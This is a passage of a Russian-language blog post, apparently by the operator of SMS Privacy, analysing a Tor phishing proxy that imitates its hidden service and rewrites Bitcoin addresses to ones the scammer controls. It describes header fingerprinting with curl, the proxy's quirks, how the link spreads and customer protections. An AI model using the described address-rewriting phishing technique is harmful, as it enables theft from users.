  &lt;p&gt;Возможно, чтобы уменьшить время загрузки страницы: если прокси не нужно знать длину досрочно, он может передавать контент непосредственно клиенту по мере его получения, изменяя его по мере его поступления. Если он должен был прочитать все содержимое, затем выполнить его изменения, а затем отправить все дальше, это может увеличить время загрузки страницы, что вызовет подозрение.&lt;/p&gt;
  &lt;p&gt;Возможно, автор счел, что хранение всего содержимого является неприемлемо высокой нагрузкой на память. Если тот же сервер проксирует от десятков до сотен других скрытых сервисов, это может быть разумным решением.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Заголовок Connection неверный&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Ниже приведено сравнение заголовков ответов:&lt;/p&gt;
  &lt;p&gt;Код:&lt;/p&gt;
  &lt;pre&gt;$ torsocks curl -I http://smspriv6fynj23u6.onion/
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Fri, 13 Oct 2017 05:37:49 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 7387
Connection: keep-alive
Set-Cookie: [...]
X-Frame-Options: DENY
&lt;/pre&gt;
  &lt;p&gt;Легитимный сайт&lt;/p&gt;
  &lt;p&gt;Код:&lt;/p&gt;
  &lt;pre&gt;$ torsocks curl -I http://smsprivyevs6xn6z.onion/
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Fri, 13 Oct 2017 05:37:57 GMT
Content-Type: text/html;charset=UTF-8
Connection: [object Object]
Set-Cookie: [...]
X-Frame-Options: DENY

&lt;/pre&gt;
  &lt;p&gt;Фишинговый сайт&lt;/p&gt;
  &lt;p&gt;Заголовок Connection изменен с keep-alive на [object Object]. Это то, что вы получаете в javascript при преобразовании объекта в строку, если объект не реализует toString(). Это может быть ключ к пониманию на каком программном обеспечении запущен прокси-сервер.&lt;/p&gt;
  &lt;p&gt;Скорее всего, он использует NodeJS. Я не смог обнаружить ничего, что могло бы вызвать эту ошибку в &lt;a href=&quot;https://github.com/nodejitsu/node-http-proxy&quot; target=&quot;_blank&quot;&gt;node-http-proxy&lt;/a&gt; или &lt;a href=&quot;https://github.com/No9/harmon&quot; target=&quot;_blank&quot;&gt;Harmon&lt;/a&gt;(промежуточное программное обеспечение для node-http-proxy для изменения ответа).&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Сервер кеширует файлы Javascript (и, возможно, другие).&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Я добавил некоторый Javascript, чтобы определить, будет ли он запущен на фишинговом домене. Я обнаружил, что изменения в моем скрипте были отображены в браузере при использовании легитимного сайта, но устаревшая версия была использована при использовании фишингового сайта, поэтому я считаю, что фишинг-сайт делает некоторое дополнительное кеширование. Это снова может быть связано с уменьшением времени загрузки страницы.&lt;/p&gt;
  &lt;p&gt;Я попытался исследовать это кеширование и нашел что-то еще более интересное! Прокси-сервер теперь удаляет весь контент из моего скрипта отслеживания, поэтому я не могу получить больше информации о них. Это легко устранить, переименовав скрипт и немного изменив контент, но это игра в кошки-мышки, в которую я не собираюсь играть. Как минимум, это означает, что кто-то активно наблюдает за этим прокси-сервером и предпринимает шаги для его работы.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Адрес скрытого сервиса изменен&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Прокси, похоже, переписывает все экземпляры smspriv6fynj23u6.onion в smsprivyevs6xn6z.onion.&lt;/p&gt;
  &lt;p&gt;Хотя, что интересно, он не делает то же самое для прописных букв.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Адреса биткоин-кошельков изменены&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Это истинная цель фишингового сайта. Обычно фишинг-сайт будет существует для сбора учетных данных пользователей, которые затем могут быть использованы или проданы позже, но этот сайт использует гораздо более прямой подход, просто переписывает адреса биткойнов на адреса, контролируемые мошенником.&lt;/p&gt;
  &lt;p&gt;При первом переходе на страницу оплаты происходит небольшая задержка до того, как страница загрузится, предположительно, в то время как бэкэнд создает новый адрес биткойна (это занимает заметное количество времени, подразумевает, что он вставляется в огромную базу данных адреса, который не имеет индексов, или генерируется на медленной машине, или создается кодом, написанным на медленном языке. Если последнее, то RNG (Генератор Случайных Чисел) небезопасен). Все адреса биткойнов, отображаемые в тексте, переписываются на адреса, контролируемые злоумышленником. Примечательно, что QR-код остается неизменным и все еще декодирует законный адрес.&lt;/p&gt;
  &lt;p&gt;Я отправил платеж одному из адресов мошенника, чтобы узнать, что произойдет: 1GM6Awv28kSfzak2Y7Pj1NRdWiXshMwdGW. Он просто не появился на сайте, что добавляет больше доверия к теории о том, что сайт в основном является глупым прокси. Деньги еще не потрачены, но было бы интересно посмотреть, куда они уйдут, если будут потрачены.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Как cайт распространяется среди пользователей?&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Я видел несколько разных результатов, которые отправляют referer на сервер при просмотре фишингового домена. В основном это были люди, просматривающие скрытую службу через веб-прокси (например, onion.link), но я обнаружил 2 скрытых сервиса:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;7cbqhjnpcgixggts.onion: «The onion crate»: это список скрытых сервисов Tor. Как старый «веб-каталог», но для Tor. Версия фишинга отмечена очень заметно как «фишинговая ссылка».&lt;/li&gt;
    &lt;li&gt;hss3uro2hsxfogfq.onion: «not Evil»: это поисковая система для скрытых сервисов Tor. Поиск «sms privacy» поднимает легитимный сайт вверху, а второй — фишинговый сайт. Я нажал кнопку «Сообщить о нарушении» рядом с фишинговым сайтом, но она еще не удалена.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Я надеялся найти твит, сообщение в блоге или подобное, когда кто-то выдает фишинговую ссылку вместо реальной. Маловероятно, что люди, стоящие за «The onion crate», несут ответственность за фиш. Если бы я пытался заставить людей использовать мой фишинговый сайт, я бы не отмечал его как «фишинговую ссылку». Возможно, что люди, управляющие поисковой системой «not Evil», являются исполнителями, хотя все это маловероятно. Если бы я работал с поисковой системой с целью отправки людей на фишинг-ссылки, я бы вообще не включил легитимную ссылку в поисковую выдачу.&lt;/p&gt;
  &lt;p&gt;Возможно, что фишинговая кампания еще не началась, хотя обратите внимание, что «The onion crate» обозначил фишинг-ссылку как 2017-05-17, что означает, что она существует длительное время.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Кто несет ответственность?&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Скорее всего, это злобный кибер-преступник, который написал прокси-сервер, который заменяет адреса Биткойна своими собственными адресами, генерирует правдоподобные скрытые служебные адреса для различных скрытых сервисов и сидит, ожидая, когда деньги придут к нему.&lt;/p&gt;
  &lt;p&gt;Сначала я подумал, что это может быть служба разведки, надеющаяся следить за пользователями SMS Privacy. Но если вы надеялись сделать какое-то скрытое наблюдение, вы не измените адреса биткойнов до такой степени, что сайт больше не будет работать. Я предполагаю, что это может быть спроектировано, чтобы шпионить за определенным подмножеством пользователей и действовать как фишинг-сайт для всех остальных, но я думаю, что более вероятное объяснение «опытного кибер-преступника».&lt;/p&gt;
  &lt;p&gt;Фишинг скрытых сервисов гораздо проще, чем фишинг традиционных веб-сайтов, потому что нет (по дизайну) нет простого способа найти сервер скрытого сервиса, и нет централизованной системы именования, что означает, что даже у легитимных сайтов есть случайные символы в адресе. Получение правдоподобных адресов сравнительно просто. И даже после обнаружения фишингового сайта его чрезвычайно сложно закрыть. Это совершенное преступление. Единственным недостатком является то, что пользовательская база имеет тенденцию быть намного более технически подкованной, и ее не так легко обмануть, по сравнению с пользователями клирнета.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Как клиенты могут защитить себя?&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Клиенты SMS Privacy должны убедиться, что они просматривают smsprivacy.org с помощью HTTPS, или, если вы используете Tor, smspriv6fynj23u6.onion является единственным легитимным адресом.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Кто-нибудь был обманут?&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Я никогда не получал никаких писем от людей, жалующихся на то, что их платежи пропали без вести. (Ну, это не совсем так, но в каждом случае это моя ошибка, а не случайный просмотр фишингового сайта). Поэтому, я бы сказал, что ни один пользователь не был обманут.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Дальнейшее расследование&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Я думаю, что программное обеспечение, использующее этот прокси, также проксирует многие другие скрытые сервисы.&lt;/p&gt;
  &lt;p&gt;На самом деле, может быть интересно найти другие фишинговые сайты и посмотреть, имеют ли они одни и те же особенности (Connection: [object Object], заголовок Content-Length удален, переписывание адреса сайта только в нижнем регистре…).&lt;/p&gt;
  &lt;p&gt;Также может быть интересно попробовать обнаружить уязвимости и посмотреть, можно ли узнать полный список скрытых сервисов, которые проксируются. Существует некая вероятность того, что выбор имени хоста выполняется в прокси-коде, что означало бы, что запрос имени хоста одного фишингового сайта может вернуть содержимое другого фишингового сайта! Это будет очень сильный показатель того, что они работают на одной машине.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Вывод&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Было довольно интересно найти кого-то, кто активно это делает, и небольшая мысль показывает, насколько легко это можно сделать в больших масштабах. Я не удивлюсь, если в будущем появятся намного больше фишинговых сайтов.&lt;/p&gt;

</content></entry></feed>